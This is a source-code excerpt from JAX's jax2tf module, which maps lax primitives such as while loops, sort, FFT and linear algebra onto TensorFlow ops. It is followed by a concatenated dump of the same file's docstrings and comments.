  out.set_shape(_aval_to_tf_shape(_out_aval))
  return out
# All scatter variants share this rule; the variant's combining function is
# carried in update_jaxpr.
tf_impl_with_avals[lax.scatter_p] = _scatter
tf_impl_with_avals[lax.scatter_min_p] = _scatter
tf_impl_with_avals[lax.scatter_max_p] = _scatter
tf_impl_with_avals[lax.scatter_mul_p] = _scatter
tf_impl_with_avals[lax.scatter_add_p] = _scatter
def _dynamic_update_slice(operand, update, *start_indices):
  """Implements lax.dynamic_update_slice via the TFXLA op."""
  if not _enable_xla:
    raise _xla_disabled_error("dynamic_update_slice")
  indices = tf.stack(start_indices)
  return tfxla.dynamic_update_slice(operand, update, indices)
tf_impl[lax.dynamic_update_slice_p] = _dynamic_update_slice
def _cond(index: TfVal, *operands: TfVal, branches: Sequence[core.ClosedJaxpr],
          linear: Sequence[bool]) -> Sequence[TfVal]:
  """Implements lax.cond/switch via tf.switch_case."""
  del linear
  # tf.switch_case expects zero-argument callables, so bind operands now.
  branch_thunks = [
      functools.partial(_interpret_jaxpr, branch_jaxpr, *operands)
      for branch_jaxpr in branches
  ]
  return tf.switch_case(index, branch_thunks)
tf_impl[lax_control_flow.cond_p] = _cond
def _while(*args: TfVal, cond_nconsts: int, cond_jaxpr: core.ClosedJaxpr,
           body_nconsts: int, body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
  """Implements lax.while_loop via tf.while_loop."""
  cond_consts, body_consts, init_carry = util.split_list(
      args, [cond_nconsts, body_nconsts])
  # A non-scalar conditional means this is a batched while loop; handle it
  # separately by rewriting it into a scalar-conditioned loop.
  if cond_jaxpr.out_avals[0].shape:  # type: ignore[attr-defined]
    return _batched_cond_while(
        *args,
        cond_nconsts=cond_nconsts,
        cond_jaxpr=cond_jaxpr,
        body_nconsts=body_nconsts,
        body_jaxpr=body_jaxpr)

  def scalar_cond(*carry: TfVal) -> TfVal:
    # tf.while_loop requires the condition to return a single scalar value.
    res, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *carry)
    return res

  body_fn = functools.partial(_interpret_jaxpr, body_jaxpr, *body_consts)
  return tf.while_loop(scalar_cond, body_fn, init_carry)
def _batched_cond_while(*args: TfVal, cond_nconsts: int,
                        cond_jaxpr: core.ClosedJaxpr, body_nconsts: int,
                        body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
  """Interprets a while_loop with a batched condition.

  A batched while has a conditional that returns a tensor of booleans, and
  a body that returns a list of tensors whose leading dimensions match those
  of the conditional tensor.

  We need to turn it into a while with scalar boolean conditional. We will
  expand the loop carry to include a prefix with the current tensor boolean
  condition. We prepend to the loop the first calculation of the tensor boolean
  condition. The loop condition will use a "reduce_any" to calculate a scalar
  boolean from the tensor boolean condition. The end of the loop body will
  compute the new carry using a "tf.where", and we compute the new tensor
  boolean condition.
  """
  cond_consts, body_consts, init_carry = util.split_list(
      args, [cond_nconsts, body_nconsts])
  # Initial computation of batched condition
  init_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *init_carry)
  assert init_pred_b is not core.unit
  # Scalar loop condition: continue while ANY batch element's predicate holds.
  def new_cond_tf_func(pred_b: TfVal, *carry: TfVal) -> TfVal:
    pred = tf.reduce_any(pred_b, axis=list(range(len(pred_b.shape))))
    return pred
  # Loop body: run the batched body, but only commit the new carry for batch
  # elements whose predicate was still true; then recompute the predicate.
  def new_body_tf_func(pred_b: TfVal, *carry: TfVal) -> Sequence[TfVal]:
    new_carry: Sequence[TfVal] = _interpret_jaxpr(body_jaxpr, *body_consts,
                                                  *carry)
    # Per-element select between the updated and the previous carry value,
    # broadcasting the predicate over the carry's trailing dimensions.
    def select_one_carry(new_c: TfVal, c: TfVal) -> TfVal:
      pred_b_bcast = _broadcast_in_dim(
          pred_b,
          shape=new_c.shape,
          broadcast_dimensions=list(range(len(pred_b.shape))))
      return tf.where(pred_b_bcast, new_c, c)
    selected_carry: Sequence[TfVal] = list(
        util.safe_map(select_one_carry, new_carry, carry))
    next_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *selected_carry)
    return (next_pred_b, *selected_carry)
  # Drop the predicate prefix from the final carry before returning.
  _, *res_carry = tf.while_loop(new_cond_tf_func, new_body_tf_func,
                                (init_pred_b, *init_carry))
  return res_carry
tf_impl[lax_control_flow.while_p] = _while
# We use the scan impl rule to rewrite in terms of while.
tf_impl_with_avals[lax_control_flow.scan_p] = _convert_jax_impl(
    lax_control_flow._scan_impl)
def _top_k(operand: TfVal, k: int) -> Tuple[TfVal, TfVal]:
  """Implements lax.top_k via tf.math.top_k, promoting unsupported dtypes."""
  # Some dtypes are incompatible with tf.math.top_k but can be promoted to a
  # compatible type without loss of precision; the values are cast back after.
  promotions = {
      tf.bool: tf.uint32,
      tf.uint8: tf.uint32,
      tf.uint16: tf.uint32,
      tf.int8: tf.int32,
      tf.int16: tf.int32,
      tf.float16: tf.float32,
  }
  target_dtype = promotions.get(operand.dtype)
  if target_dtype is None:
    return tf.math.top_k(operand, k=k, sorted=True)
  values, indices = tf.math.top_k(
      tf.dtypes.cast(operand, target_dtype), k=k, sorted=True)
  return tf.dtypes.cast(values, operand.dtype), indices
tf_impl[lax.top_k_p] = _top_k
def _sort(*operands: TfVal, dimension: int, is_stable: bool,
          num_keys: int) -> Tuple[TfVal, ...]:
  """Implements lax.sort using the TFXLA variadic sort op.

  Args:
    operands: arrays to sort together; the first `num_keys` operands form
      the lexicographic sort key.
    dimension: the dimension along which to sort.
    is_stable: whether the sort must be stable.
    num_keys: number of leading operands participating in the key.

  Returns:
    A tuple of sorted arrays, one per operand.
  """
  if not _enable_xla:
    raise _xla_disabled_error("sort")
  assert 1 <= num_keys <= len(operands)
  assert 0 <= dimension < len(
      operands[0].shape
  ), f"Invalid {dimension} for ndim {len(operands[0].shape)}"
  # Note: a hand-rolled `lexicographic_comparator_old` used to live here; it
  # was dead code (never referenced) and has been removed.
  comparator_spec: List[tf.TensorSpec] = []
  comparator_jax_in_avals: List[core.AbstractValue] = []
  for op in operands:
    o_spec = tf.TensorSpec((), dtype=op.dtype)
    comparator_spec.extend([o_spec, o_spec])
    o_aval = core.ShapedArray((), to_jax_dtype(op.dtype))
    comparator_jax_in_avals.extend([o_aval, o_aval])

  # Use the same comparator that JAX uses when compiling to XLA, to get the
  # proper NaN/Inf total order, and the lexicographic ordering.
  # The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1]
  # corresponding to two scalars from operand[k].
  def lexicographic_comparator(*tf_args: TfVal) -> TfVal:
    return _convert_jax_impl(
        lax._sort_lt_comparator, multiple_results=False)(
            *tf_args,
            _in_avals=comparator_jax_in_avals,
            _out_aval=core.ShapedArray((), np.bool_),
            num_keys=num_keys)

  # tfxla.variadic_sort requires a traced ConcreteFunction as comparator.
  xla_comparator_computation = (
      tf.function(lexicographic_comparator,
                  autograph=False).get_concrete_function(*comparator_spec))
  results = tfxla.variadic_sort(
      operands,
      dimension=dimension,
      is_stable=is_stable,
      comparator=xla_comparator_computation)
  return results
tf_impl[lax.sort_p] = _sort
def _fft(x, fft_type, fft_lengths):
  """Implements lax.fft using the tf.signal FFT family of ops."""
  FFT, IFFT, RFFT, IRFFT = list(map(xla_client.FftType, [0, 1, 2, 3]))
  # The tf.signal ops take no explicit lengths, so the requested fft_lengths
  # must match what the TF op will infer from the input shape.
  if fft_type == IRFFT:
    expected_lengths = x.shape[-len(fft_lengths):-1] + ((x.shape[-1] - 1) * 2,)
  else:
    expected_lengths = x.shape[-len(fft_lengths):]
  if expected_lengths != fft_lengths:
    raise NotImplementedError(
        f"Unsupported fft_lengths={fft_lengths} for fft_type={fft_type} of "
        f"array with shape={x.shape}.")
  # Dispatch on (fft_type, rank of transform): 1-D, 2-D or 3-D variants.
  tf_funcs = {
      FFT: [tf.signal.fft, tf.signal.fft2d, tf.signal.fft3d],
      IFFT: [tf.signal.ifft, tf.signal.ifft2d, tf.signal.ifft3d],
      RFFT: [tf.signal.rfft, tf.signal.rfft2d, tf.signal.rfft3d],
      IRFFT: [tf.signal.irfft, tf.signal.irfft2d, tf.signal.irfft3d]
  }
  tf_func = tf_funcs[fft_type][len(fft_lengths) - 1]
  return tf_func(x)
tf_impl[lax_fft.fft_p] = _fft
def _qr(operand, full_matrices):
  """Implements lax_linalg.qr; tf.linalg.qr matches JAX's calling convention."""
  return tf.linalg.qr(operand, full_matrices=full_matrices)
tf_impl[lax_linalg.qr_p] = _qr
def _svd(operand, full_matrices, compute_uv):
  """Implements lax_linalg.svd; JAX returns V^H where TF returns V."""
  if not compute_uv:
    # Singular values only; wrap in a tuple to match the primitive's output.
    return (tf.linalg.svd(operand, full_matrices, compute_uv),)
  s, u, v = tf.linalg.svd(operand, full_matrices, compute_uv)
  # JAX's convention returns the adjoint of V.
  return s, u, tf.linalg.adjoint(v)
tf_impl[lax_linalg.svd_p] = _svd
def _eig(operand: TfVal, compute_left_eigenvectors: bool,
         compute_right_eigenvectors: bool):
  """Implements lax_linalg.eig in terms of tf.linalg.eig/eigvals."""
  if compute_left_eigenvectors and compute_right_eigenvectors:
    # TODO(bchetioui): didn't find a 100% reliable, easy and satisfying way to
    # sort the left eigenvectors in the right order. The jax.numpy.linalg API
    # suggests to me that left eigenvectors are anyway seldom used, so I
    # think it is acceptable to leave as unimplemented for now.
    raise NotImplementedError(
        "Conversion of eig is not implemented when both "
        "compute_left_eigenvectors and compute_right_eigenvectors are set "
        "to True.")
  if not (compute_left_eigenvectors or compute_right_eigenvectors):
    # Eigenvalues only.
    return tuple([tf.linalg.eigvals(operand)])
  if compute_right_eigenvectors:
    return tuple(tf.linalg.eig(operand))
  # Left eigenvectors only: the eigen-decomposition of the adjoint yields
  # conjugated eigenvalues together with the left eigenvectors.
  wH, vl = tf.linalg.eig(tf.linalg.adjoint(operand))
  wHH = tf.math.conj(wH)
  return tuple([wHH, vl])
tf_impl[lax_linalg.eig_p] = _eig
def _eigh(operand: TfVal, lower: bool, _in_avals, _out_aval):
  """Implements lax_linalg.eigh via tf.linalg.eigh."""
  if operand.shape[-1] == 0:
    # Empty matrix: produce empty eigenvectors/eigenvalues of the right shape.
    v = operand
    w = tf.reshape(operand, _eval_shape(_in_avals[0].shape[:-1]))
  else:
    if not lower:
      # tf.linalg.eigh reads the lower triangle; adjoint to use the upper one.
      operand = tf.linalg.adjoint(operand)
    w, v = tf.linalg.eigh(operand)
  # Eigenvalues of a Hermitian matrix are real; cast down for complex inputs.
  real_dtype = {
      tf.complex64: tf.float32,
      tf.complex128: tf.float64
  }.get(operand.dtype)
  if real_dtype is not None:
    w = tf.cast(w, real_dtype)
  return v, w
tf_impl_with_avals[lax_linalg.eigh_p] = _eigh
def _lu(operand: TfVal, _in_avals, _out_aval):
  """Implements lax_linalg.lu by converting JAX's pure-Python LU impl."""
  return _convert_jax_impl(lax_linalg._lu_python)(
      operand, _in_avals=_in_avals, _out_aval=_out_aval)
tf_impl_with_avals[lax_linalg.lu_p] = _lu
def _triangular_solve(a: TfVal, b: TfVal, *, left_side: bool, lower: bool,
                      transpose_a: bool, conjugate_a: bool, unit_diagonal: bool,
                      _in_avals: Sequence[core.ShapedArray],
                      _out_aval: core.ShapedArray):
  """Implements lax_linalg.triangular_solve via tf.linalg.triangular_solve."""
  if unit_diagonal:
    # TF has no unit_diagonal option; overwrite the diagonal with ones.
    a_aval, _ = _in_avals
    a_shape = _eval_shape(a_aval.shape)
    a = tf.linalg.set_diag(a, tf.ones(a_shape[:-1], dtype=a.dtype))
  if not left_side:
    # TF only solves `a x = b`; transpose both sides (and flip lower/upper)
    # to reduce the right-side solve `x a = b` to that form.
    rank = len(a.shape)
    transpose_dimensions = list(range(rank - 2)) + [rank - 1, rank - 2]
    a = tf.transpose(a, transpose_dimensions)
    b = tf.transpose(b, transpose_dimensions)
    lower = not lower
  # adjoint == transpose for real dtypes, so special care need only be taken
  # for complex types: when exactly one of transpose/conjugate is requested,
  # conjugating `a` first makes `adjoint=transpose_a` compute the right op.
  if a.dtype in [tf.complex64, tf.complex128] and transpose_a != conjugate_a:
    a = tf.math.conj(a)
  result = tf.linalg.triangular_solve(a, b, lower=lower, adjoint=transpose_a)
  if not left_side:
    result = tf.transpose(result, transpose_dimensions)
  return result
tf_impl_with_avals[lax_linalg.triangular_solve_p] = _triangular_solve
def _linear_solve(*args: TfVal, const_lengths, jaxprs, _in_avals, _out_aval):
  """Implements lax.custom_linear_solve by converting JAX's impl rule."""
  return _convert_jax_impl(lax_control_flow._custom_linear_solve_impl)(
      *args,
      const_lengths=const_lengths,
      jaxprs=jaxprs,
      _in_avals=_in_avals,
      _out_aval=_out_aval)
tf_impl_with_avals[lax_control_flow.linear_solve_p] = _linear_solve
def _custom_jvp_call_jaxpr(*args: TfVal, fun_jaxpr: core.ClosedJaxpr,
                           jvp_jaxpr_thunk: Callable,
                           num_consts: int) -> Sequence[TfVal]:
  """Interprets the primal function of a custom_jvp; the JVP rule is unused."""
  # TODO(necula): ensure that there is no AD transformation in scope
  return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_jvp_call_jaxpr_p] = _custom_jvp_call_jaxpr
def _custom_vjp_call_jaxpr(*args: TfVal, fun_jaxpr: core.ClosedJaxpr,
                           **_) -> Sequence[TfVal]:
  """Interprets the primal function of a custom_vjp; the VJP rule is unused."""
  # TODO(necula): ensure that there is no AD transformation in scope
  return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_vjp_call_jaxpr_p] = _custom_vjp_call_jaxpr
def _custom_lin(*args: TfVal, **_) -> Sequence[TfVal]:
  """Rejects forward-mode AD applied to a custom_vjp function."""
  raise TypeError("can't apply forward-mode autodiff (jvp) to a custom_vjp "
                  "function.")
tf_impl[ad.custom_lin_p] = _custom_lin
def split_to_logical_devices(tensor: TfVal,
                             partition_dimensions: pxla.PartitionsOrReplicated):
  """Like TPUMPStrategy.experimental_split_to_logical_devices.

  For jax2tf purposes we want to avoid needing to thread the `strategy` object
  through the generated computation. It seems that the original function needs
  the strategy object only for error checking, which we assume is done upstream
  by JAX.

  Args:
    tensor: Input tensor to annotate.
    partition_dimensions: A list of integers, with one integer per tensor
      dimension, specifying in how many parts the dimension should be split.
      The product of integers must equal the number of devices per replica.
      If None, the tensor is annotated as replicated instead.

  Returns:
    an annotated tensor.
  """
  # This corresponds to the sharding annotations in
  # xla_bridge._sharding_to_proto.
  if partition_dimensions is None:
    return xla_sharding.replicate(tensor, use_sharding_op=True)
  num_partition_splits = np.prod(partition_dimensions)
  tile_assignment = np.arange(num_partition_splits).reshape(
      partition_dimensions)
  return xla_sharding.tile(tensor, tile_assignment, use_sharding_op=True)
def _sharded_call(f: lu.WrappedFun, vals: Sequence[TfVal],
                  in_parts: Sequence[pxla.PartitionsOrReplicated],
                  out_parts_thunk,
                  **_) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
  """Annotates the inputs and outputs of a sharded call with sharding ops."""
  sharded_vals = util.safe_map(split_to_logical_devices, vals, in_parts)
  vals_out = f.call_wrapped(*sharded_vals)  # caller handles new_sublevel
  out_parts_flat = out_parts_thunk()
  assert len(out_parts_flat) == len(
      vals_out), f"expected {len(out_parts_flat)} == {len(vals_out)}"
  # Annotate each output with its partitioning, keeping the abstract value.
  sharded_vals_out = []
  for (val, val_aval), val_part in util.safe_zip(vals_out, out_parts_flat):
    sharded_vals_out.append(
        (split_to_logical_devices(val, val_part), val_aval))
  return sharded_vals_out
def _sharding_constraint(arg: TfVal, *,
                         partitions: pxla.PartitionsOrReplicated):
  """Applies a sharding annotation to `arg` per `partitions`."""
  return split_to_logical_devices(arg, partitions)
tf_impl[sharded_jit.sharding_constraint_p] = _sharding_constraint
def _register_checkpoint_pytrees():
  """Registers TF custom container types as pytrees."""
  m = tf.Module()
  # The types here are automagically changed by TensorFlow's checkpointing
  # infrastructure.
  m.a = (tf.Module(), tf.Module())
  m.b = [tf.Module(), tf.Module()]
  m.c = {"a": tf.Module()}
  # Capture the wrapper types TF substituted for tuple/list/dict.
  tuple_wrapper = type(m.a)
  list_wrapper = type(m.b)
  dict_wrapper = type(m.c)
  # TF AutoTrackable swaps container types out for wrappers.
  assert tuple_wrapper is not tuple
  assert list_wrapper is not list
  assert dict_wrapper is not dict
  # Register each wrapper so jax.tree_util flattens it like the corresponding
  # builtin container (dicts keep their keys as the aux data).
  jax.tree_util.register_pytree_node(tuple_wrapper, lambda xs:
                                     (tuple(xs), None), lambda _, xs: tuple(xs))
  jax.tree_util.register_pytree_node(list_wrapper, lambda xs: (tuple(xs), None),
                                     lambda _, xs: list(xs))
  jax.tree_util.register_pytree_node(
      dict_wrapper, lambda s: (tuple(s.values()), tuple(s.keys())),
      lambda k, xs: dict(zip(k, xs)))
_register_checkpoint_pytrees()
| jax/experimental/jax2tf/jax2tf.py | 99,352 | Trace class that underlies the jax2tf transformation.
We are going to ensure that jax2tf.convert is never nested inside other
transformations. This is sufficient for intended use cases (converting
fully-transformed JAX code). It also simplifies our job because we do not have
to handle situations where we apply primitives on a mix of TF values and
JAX tracers from an outer transformation. E.g., for addition both the TF
values
and the JAX tracers have an override and they get confused if they see values
from the other world.
Hence a TFT trace does not interact with non-TFT traces at lower-level. For
higher-order control-flow primitives we invoke recursively
_interpret_fun on the body of the conditional, which will create a nested TFT.
We do want to allow transformations nested inside a TensorFlowTrace (TFT), but
those will introduce their own MainTrace, and any operations involving those
will be done on those traces, i.e., not a concern for TFT.
Tracer class that boxes a TF value and a JAX abstract value.
In addition to the TF value we carry the JAX abstract value because there are
two cases when it cannot be recovered from the value: (a) when the abstract
value is core.abstract_unit, in which case the value is tf.nan; (b) when we
are converting with polymorphic shapes, in which case the shape of the value
may have dimensions set to `None`, which the JAX abstract value may contain
more precise information.
When the value has a partially-known shape, the dimensions marked as `None`
must correspond to non-constant dimensions in the abstract value.
See README.md for details.
Computes abstract values and a dimension environment for arguments.
Args:
args: the arguments, TF inputs.
polymorphic_shapes: the polymorphic specifications for the arguments.
Returns: a tuple of a sequence of abstract values corresponding to the
arguments and a dimension environment.
Generate a TF shape, possibly containing None for polymorphic dimensions.
Interprets a while_loop with a batched condition.
A batched while has a conditional that returns a tensor of booleans, and
a body that returns a list of tensors whose leading dimensions match those
of the conditional tensor.
We need to turn it into a while with scalar boolean conditional. We will
expand the loop carry to include a prefix with the current tensor boolean
condition. We prepend to the loop the first calculation of the tensor boolean
condition. The loop condition will use a "reduce_any" to calculate a scalar
boolean from the tensor boolean condition. The end of the loop body will
compute the new carry using a "tf.where", and we compute the new tensor
boolean condition.
Implementation of lax.conv_general_dilated_p using XlaConv.
Converts a ConvDimensionNumbers to an XLA ConvolutionDimensionNumbers.
Convert the JAX implementation of a primitive.
Args:
jax_impl: typically the impl-rule for a primitive, with signature
`(*args: JaxVal, **kwargs) -> Sequence[JaxVal]`. This function implements
a primitive in terms of other primitives.
multiple_results: whether `jax_impl` returns a sequence of results.
Returns:
a function with signature `(*args: TfVal, _in_avals, _out_aval, **kwargs)
-> Sequence[TfVal]`.
Implementation of lax.dot_general_p in terms of tf.linalg.einsum.
Tensorflow implementation of gather.
Evaluates a Jaxpr with tf.Tensor arguments.
The output is a sequence of TfVal (no `core.unit`), suitable for use with TF.
Computes bitwise not with support for booleans.
Numpy and JAX support bitwise not for booleans by applying a logical not!
This means that applying bitwise_not yields an unexpected result:
jnp.bitwise_not(jnp.array([True, False]))
>> DeviceArray([False, True], dtype=bool)
if you assume that booleans are simply casted to integers.
jnp.bitwise_not(jnp.array([True, False]).astype(np.int32)).astype(bool)
>> DeviceArray([True, True], dtype=bool)
Convert an integer to an XLA.PrecisionConfig.
TensorFlow implementation of reduce_window.
Args:
operand: N dimensional array containing elements of type T
init_value: starting value of the reduction
jaxpr: the jaxpr corresponding to the reduction function
consts: the constants associated with jaxpr.
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
Returns:
The reduced operand.
Registers TF custom container types as pytrees.
Wraps the TensorFlow reduce window operation based on a reducer and an
identity function defining the initial value of the reduction depending on
the dtype of the operand.
Args:
reducer: reduction function of type TfVal -> TfVal -> TfVal
identity: function that takes a TensorFlow dtype as a parameter and returns
the starting value of the reduction.
operand: N dimensional array containing elements of type T
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
name: the name of the specialized reduce window primitive for which this
conversion function is called. This information may help to choose a
different conversion path (optional)
Returns:
The reduced operand.
Called for constants that occur in the program, or for input values to the converted function.
The returned shape may have unknown components, but only when called for
inputs.
Computes bool valued functions using int8.
Transforms `fun` to be executed by TensorFlow.
See
[README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md)
for more details about usage and common problems.
Args:
fun: Function to be transformed. Its arguments and return value should be
JAX arrays, or nested standard Python containers (tuple/list/dict) thereof
(pytrees).
polymorphic_shapes: Specifies input shapes to be treated polymorphically
during conversion.
.. warning:: The shape-polymorphic conversion is an experimental feature.
It is meant to be sound, but it is known to reject some JAX programs
that are shape polymorphic. The details of this feature can change. It
should be a Python object with the same pytree structure as, or a prefix
of, the tuple of arguments to the function, but with a shape
specification corresponding to each argument. The default value is
`None`, which is a shortcut for a tuple of `None` one for each argument,
denoting that all shapes are monomorphic.
See [how optional parameters are matched to
arguments](https://jax.readthedocs.io/en/latest/pytrees.html#applying-optional-parameters-to-pytrees).
A shape specification for an array argument should be an object
`PolyShape(dim0, dim1, ..., dimn)`
where each `dim` is a dimension specification: a positive integer denoting
a monomorphic dimension of the given size, or a string denoting a
dimension variable assumed to range over non-zero dimension sizes, or
the special placeholder string "_" denoting a monomorphic dimension
whose size is given by the actual argument. As a shortcut, an Ellipsis
suffix in the list of dimension specifications stands for a list of "_"
placeholders. For convenience, a shape specification can also be given
as a string
representation, e.g.: "batch, ...", "batch, height, width, _", possibly
with surrounding parentheses: "(batch, ...)".
The conversion fails if it cannot ensure that the it would produce the same
sequence of TF ops for any non-zero values of the dimension variables.
polymorphic_shapes are only supported for positional arguments; shape
polymorphism is not supported for keyword arguments.
See [the README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md#shape-polymorphic-conversion)
for more details.
in_shapes: DEPRECATED in favor of `polymorphic_shapes`.
with_gradient: if set, will add a tf.custom_gradient to the converted
function, by converting the ``jax.vjp(fun)``. Only first-order
differentiation is supported for now. If the converted function is saved
in a SavedModel, the custom gradients are currently lost and an error will
be raised if a gradient computation is attempted. This is due to a current
bug in TensorFlow.
enable_xla: if unset, the converter will try harder to use pure TF ops to
convert the function, and raise an error if it can not be converted
without resorting to XLA ops (default: True).
Returns:
A version of `fun` that expects TfVals as arguments (or
tuple/lists/dicts) thereof, and returns TfVals as outputs.
The abstract value for an input.
Lifts a non-Tracer into the TensorFlowTracer.
This function may be called by way of trace.full_raise.
The value may be a core.unit. During JAX transformations we sometimes
produce a Jaxpr that has arguments of abstract value core.abstract_unit
and results equal to core.unit. These are arguments and results that are
not used in the computation.
In TF world, we represent core.unit as NaN. This is safe, as these values
should never be used.
Injects the shape of `x` as an array value.
**Experimental: please give feedback, and expect changes!**
This allows the use of a shape expression as array argument to JAX functions.
A typical example is for implementing a mean operation:
jnp.sum(x) / np.prod(jax2tf.shape_as_value(x))
Like TPUMPStrategy.experimental_split_to_logical_devices.
For jax2tf purposes we want to avoid needing to thread the `strategy` object
through the generated computation. It seems that the original function needs
the strategy object only for error checking, which we assume is done upstream
by JAX.
Args:
tensor: Input tensor to annotate.
partition_dimensions: A list of integers, with one integer per tensor
dimension, specifying in how many parts the dimension should be split. The
product of integers must equal the number of devices per replica.
use_sharding_op: whether to use a sharding op, or not.
Returns:
an annotated tensor.
Experimental module transforms JAX functions to be executed by TensorFlow.
Copyright 2020 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. type: ignore[import] These don't have public equivalents. pylint: disable=g-direct-tensorflow-import type: ignore[import] type: ignore[import] type: ignore[import] pylint: enable=g-direct-tensorflow-import The scope name need to be a valid TensorFlow name. See https://github.com/tensorflow/tensorflow/blob/r2.3/tensorflow/core/framework/node_def_util.ccL731 A value suitable in a TF tracing context: tf.Tensor, tf.Variable, or Python scalar or numpy.ndarray. (A tf.EagerTensor is a tf.Tensor.) Enum xla_data.PrecisionConfig.Precision Note: this conversion is overkill and just intended as a type check; this code is in principle only run if config.jax_enable_checks is True. TODO: it is not true that this code is run only with jax_enable_checks. The float0 type is not known to TF. The implementation rules for primitives. The rule will be called with the arguments (TfVal) and must return TfVal (or a sequence thereof, if primitive.multiple_results). The vast majority of primitives do not need to worry about core.unit inputs or results. The exception are primarily the control-flow primitives. Some primitive implementation rules need the abstract values of arguments and the results. This is the case for the primitives implemented using _convert_jax_impl and those that need to adjust the shape of the outputs due to missing TF shape inference rules for TFXLA ops. The rules for these primitives should be added to `tf_impl_with_avals`. 
The abstract value are passed to the implementation as two special kwargs `_in_avals` (a tuple of core.AbstractValue) and `_out_aval` (a core.AbstractValue, or a tuple thereof when primitive.multiple_results). XLA is not linked in all environments; when converting a primitive, if this variable is disabled, we try harder to use only standard TF ops if they are applicable to the concrete use case; if the resulting conversion path ends up requiring a TFXLA operation, an exception is thrown instead. TODO: is there a better way to check if we are inside a transformation? Name input tensors type: ignore This function may take pytrees of TfVals. We can only set tf.custom_gradient on functions that take a flat argument list. Expand the polymorphic_shapes to match the argument pytree Add kwargs shapes. Construct the abstract values for the flat arguments, possibly based on the input shapes and the polymorphic_shapes if given. May create new shape variables. out_tree_thunk() will be the output tree, after running _interpret_fun. Prepare the grad_fn for tf.custom_gradient. One may think that we can get the pullback while we are converting the main function in the first place. That is problematic, because the pullback may contain captured tracers from the conversion of the main function. Those tracers will confuse the conversion of the pullback. So, we construct the vjp anew. type: ignore TODO: enable higher-order gradients We use PreventGradient, which is propagated through a SavedModel. Internals type: ignore We wrap the jax_impl under _interpret_fun to abstract the TF values from jax_impl and turn them into JAX abstract values. The outs may be core.unit, see comment in TensorFlowTrace.pure. type: Sequence[Union[TfVal, core.Unit]] type: ignore tracer type: ignore[attr-defined] May be partially known Must be a numeric value type: ignore[attr-defined] A dimension environment maps dimension variables to TF expressions that compute the value of the dimension. 
These expressions refer to the TF function arguments. Even if the shape of `arg` is known, we still use `tf.shape` for safety, because the promise is that we will convert the function to work for any value of the dimension. type: ignore[index] TODO: add an assertion tf.shape(arg)[i] == env[d] type: ignore A shape environment maps shape variables to TfVal. type: _ShapeEnv type: ignore[index] return shape_as_value_p.bind(x) TODO: move this to masking or to some common library, if approved shape_as_value_p = core.Primitive("shape_as_value") shape_as_value_p.multiple_results = True def _shape_as_value_impl(x): x_shape = np.shape(x) def dim_to_int(dim: shape_poly.DimSize) -> int: dim_int = _poly_dim_to_tf_dim(dim) if dim_int is None: msg = ("shape_as_value is not implemented for non-constant shapes " "except for masking and jax2tf. " f"Has shape: {x_shape}") raise TypeError(msg) else: return dim_int return tuple(map(dim_to_int, x_shape)) shape_as_value_p.def_impl(_shape_as_value_impl) def _shape_as_value_abstract(x_aval: core.AbstractValue) -> Sequence[core.AbstractValue]: rank = len(x_aval.shape) type: ignore[attr-defined] return (core.ShapedArray((), dtypes.canonicalize_dtype(np.int_), weak_type=True),) * rank shape_as_value_p.def_abstract_eval(_shape_as_value_abstract) def _shape_as_value_translation(comp, x): return xla_client._xla.ops.Tuple(comp, tuple(xb.constant(comp, d) for d in comp.GetShape(x).dimensions())) xla.translations[shape_as_value_p] = _shape_as_value_translation def _shape_as_value_jvp_rule(primals, tangents): The shape does not depend on the contents of the input x, = primals zero = ad.Zero.from_value(0.) 
return shape_as_value(x), (zero,) * len(x.shape) ad.primitive_jvps[shape_as_value_p] = _shape_as_value_jvp_rule def _shape_as_value__batching_rule(batched_args, batch_dims): xv, = batched_args batch_dim, = batch_dims batch_size = xv.shape[batch_dim] batched_shape = shape_as_value(xv) one_shape = batched_shape[0:batch_dim] + batched_shape[batch_dim+1:] res = tuple(jnp.broadcast_to(d, (batch_size, 1)) for d in one_shape) return res, (0,) * len(one_shape) batching.primitive_batchers[shape_as_value_p] = _shape_as_value__batching_rule def _shape_as_value_masking_rule(operands, operands_logical_shapes): x_logical_shape, = operands_logical_shapes return tuple(x_logical_shape) masking.masking_rules[shape_as_value_p] = _shape_as_value_masking_rule def _shape_as_value_tf(x: TfVal, _in_avals: Sequence[core.AbstractValue], _out_aval: core.AbstractValue) -> TfVal: x_aval = _in_avals[0] def dim_to_tfval(dim: shape_poly.DimSize, dim_idx: int) -> TfVal: dim_int = _poly_dim_to_tf_dim(dim) if dim_int is not None: return tf.convert_to_tensor(dim_int) else: return tf.shape(x)[dim_idx] return tuple(dim_to_tfval(dim, dim_idx) for dim_idx, dim in enumerate(x_aval.shape)) type: ignore[attr-defined] tf_impl_with_avals[shape_as_value_p] = _shape_as_value_tf TODO(b/26854495): pylint doesn't understand slots and inheritance. pylint: disable=assigning-non-slot val: TfVal _aval: core.AbstractValue type: ignore[attr-defined] If JAX does not have x64 bit mode enabled, it will force the 64-bit values to use 32-bit precision. In order to make the TF conversion follow JAX's rules, we cast the TF values down to 32-bit mode. type: ignore[attr-defined] type: ignore[attr-defined] type: ignore[attr-defined] We have a TF value with known shape, and the abstract shape is a shape variable. type: ignore type: ignore Must be a numeric value type: ignore[attr-defined] This would be called when we need to raise a tracer from a lower-level main into the TensorFlowTrace. 
